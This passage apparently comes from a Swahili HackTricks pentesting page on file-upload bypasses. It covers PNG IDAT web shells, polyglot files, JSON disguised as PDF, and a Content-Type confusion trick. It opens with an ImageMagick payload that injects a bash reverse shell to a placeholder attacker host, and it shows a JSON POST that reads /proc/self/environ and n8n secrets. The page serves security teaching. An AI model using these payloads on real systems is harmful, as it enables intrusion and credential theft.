fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Embedding PHP Shell on PNG

Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupita kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funsi imagecopyresized na imagecopyresampled kutoka PHP-GD zinahusiana sana na muktadha huu, kwani mara kwa mara hutumika kwa kubadilisha ukubwa na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyojazwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani.

Uchunguzi wa kina wa mbinu hii, ikijumuisha metodologia na matumizi yake yanayowezekana, umetolewa katika makala ifuatayo: “Encoding Web Shells in PNG IDAT chunks”. Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.

More information in: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Polyglot Files

Faili za polyglot ni chombo cha kipekee katika usalama wa mtandao, zikiwahiwa kama chameleon ambazo zinaweza kuwepo halali kwa miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni GIFAR, mseto unaofanya kazi kama GIF na pia kama RAR archive. Faili za aina hii hazijawekwa tu kwa mchanganyiko huo; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.

Manufaa kuu ya faili za polyglot iko katika uwezo wake wa kupita hatua za usalama zinazokagua faili kulingana na aina. Mikoa ya kawaida katika programu mbalimbali ni kuruhusu tu aina fulani za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (kwa mfano, JS, PHP, au faili za Phar). Hata hivyo, polyglot, kwa kuendana na vigezo vya muundo vya aina nyingi za faili, inaweza kwa hila kupita vizuizi hivi.

Licha ya ufanifu wao, polyglots hukutana na vikwazo. Kwa mfano, ingawa polyglot inaweza kuwakilisha PHAR file (PHp ARchive) na JPEG kwa wakati mmoja, ufanisi wa kupakia unaweza kutegemea sera za jukwaa kuhusu extensions za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, pande mbili za muundo wa polyglot peke yao zinaweza zisitoshe kuhakikisha kupakiwa kwake.

More information in: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Kupakia JSON halali kana kwamba ni PDF

Jinsi ya kuepuka utambuzi wa aina za faili kwa kupakia faili halali ya JSON hata kama haijeruhusiwa kwa kudanganya kuwa ni PDF (mbinu kutoka this blog post):

  • mmmagic library: Iwapo tu magic bytes %PDF ziko katika 1024 bytes za kwanza ni halali (angalia mfano kwenye post)
  • pdflib library: Ongeza muundo wa PDF wa uongo ndani ya field ya JSON ili library ifikiri ni pdf (angalia mfano kwenye post)
  • file binary: Inaweza kusoma hadi 1048576 bytes kutoka kwenye faili. Tengeneza JSON kubwa zaidi ya hiyo ili haiwezi kuchambua yaliyomo kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF

Content-Type confusion to arbitrary file read

Baadhi ya upload handlers huwaminia parsed request body (kwa mfano, context.getBodyData().files) na baadaye hunanakili faili kutoka file.filepath bila kwanza kutekeleza Content-Type: multipart/form-data. Ikiwa server inakubali application/json, unaweza kutoa obyekti ya uongo files ikielekeza filepath kwa njia yoyote ya ndani, na kubadilisha mtiririko wa upload kuwa primitive ya arbitrary file read.

Mfano wa POST dhidi ya form workflow unaorejesha binary iliyopakuliwa katika HTTP response:

POST /form/vulnerable-form HTTP/1.1
Host: target
Content-Type: application/json

{
"files": {
"document": {
"filepath": "/proc/self/environ",
"mimetype": "image/png",
"originalFilename": "x.png"
}
}
}

Backend inakopi file.filepath, hivyo response inarudisha yaliyomo ya path hiyo. Mnyororo wa kawaida: soma /proc/self/environ ili kujua $HOME, kisha $HOME/.n8n/config kwa keys na $HOME/.n8n/database.sqlite kwa user identifiers.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks